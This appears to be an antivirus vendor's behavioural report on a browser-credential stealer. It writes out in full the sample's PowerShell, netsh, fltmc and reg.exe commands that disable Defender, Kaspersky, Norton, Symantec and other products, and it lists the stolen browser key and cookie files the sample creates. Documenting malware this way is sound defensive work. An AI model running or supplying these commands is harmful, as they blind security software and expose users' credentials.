Technical Information
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '%TEMP%\' -ErrorAction SilentlyContinue"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '<Full path to file>' -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess '<Full path to file>' -ErrorAction SilentlyContinue; Add-MpPref...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction SilentlyContinue"
Executes the following
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=svchost_update dir=out action=allow program=<Full path to file>
Modifies file system
Creates the following files
- %TEMP%\browser_data_debug.log
- %TEMP%\browser_data\decrypted_keys\edge_master_key.txt
- %TEMP%\bd_login data_efc94006.db
- %TEMP%\bd_cookies.sqlite_d68d74ee.db
- %TEMP%\bd_cookies.sqlite_d68d74ee.db-shm
- %TEMP%\browser_data\cookies\firefox\default.txt
Deletes following files that it created itself
- %TEMP%\bd_login data_efc94006.db
- %TEMP%\bd_cookies.sqlite_d68d74ee.db-shm
- %TEMP%\bd_cookies.sqlite_d68d74ee.db
Miscellaneous
Executes the following
- '<SYSTEM32>\fltmc.exe' unload aswMonFlt
- '<SYSTEM32>\fltmc.exe' unload aswSnx
- '<SYSTEM32>\fltmc.exe' unload aswSP
- '<SYSTEM32>\fltmc.exe' unload aswArPot
- '<SYSTEM32>\fltmc.exe' unload aswVmm
- '<SYSTEM32>\fltmc.exe' unload klif
- '<SYSTEM32>\fltmc.exe' unload klflt
- '<SYSTEM32>\fltmc.exe' unload klkbdflt
- '<SYSTEM32>\fltmc.exe' unload klbackupdisk
- '<SYSTEM32>\fltmc.exe' unload klhk
- '<SYSTEM32>\fltmc.exe' unload bdsandbox
- '<SYSTEM32>\fltmc.exe' unload bdfsfltr
- '<SYSTEM32>\fltmc.exe' unload bdfwfpf
- '<SYSTEM32>\fltmc.exe' unload bdprivmon
- '<SYSTEM32>\fltmc.exe' unload eamonm
- '<SYSTEM32>\fltmc.exe' unload ehdrv
- '<SYSTEM32>\fltmc.exe' unload ekbdflt
- '<SYSTEM32>\fltmc.exe' unload mbamswissarmy
- '<SYSTEM32>\fltmc.exe' unload MbamChameleon
- '<SYSTEM32>\fltmc.exe' unload symefasi
- '<SYSTEM32>\fltmc.exe' unload SRTSP64
- '<SYSTEM32>\fltmc.exe' unload SRTSP
- '<SYSTEM32>\fltmc.exe' unload ccSet_N360
- '<SYSTEM32>\fltmc.exe' unload ccSet_NSE
- '<SYSTEM32>\fltmc.exe' unload BHDrvx64
- '<SYSTEM32>\fltmc.exe' unload BHDrvx86
- '<SYSTEM32>\fltmc.exe' unload IDSVia64
- '<SYSTEM32>\fltmc.exe' unload naveng
- '<SYSTEM32>\fltmc.exe' unload navex15
- '<SYSTEM32>\fltmc.exe' unload WdFilter
- '<SYSTEM32>\fltmc.exe' unload WdNisDrv
- '<SYSTEM32>\fltmc.exe' unload WdBoot
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Norton\Antivirus\properties\BrowserProtection\Common /v TemporaryDisabled /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Norton\Antivirus\properties\BrowserProtection\Common /v ProviderEnabled /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Symantec\Symantec Endpoint Protection\CurrentVersion\SharedDefs" /v TemporaryDisabled /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Symantec\Symantec Endpoint Protection\CurrentVersion\SharedDefs" /v ProviderEnabled /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Norton\Antivirus\properties\exclusions\PasswordProtection /v ExcludedFiles /t REG_SZ /d <Full path to file> /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Norton\Antivirus\properties\exclusions\FileProtection /v ExcludedFiles /t REG_SZ /d <Full path to file> /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\KasperskyLab\protected\AVP\settings /v EnableSelfProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Norton\Antivirus\properties\BrowserProtection\Common /v TemporaryDisabled /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Norton\Antivirus\properties\BrowserProtection\Common /v ProviderEnabled /t REG_DWORD /d 1 /f
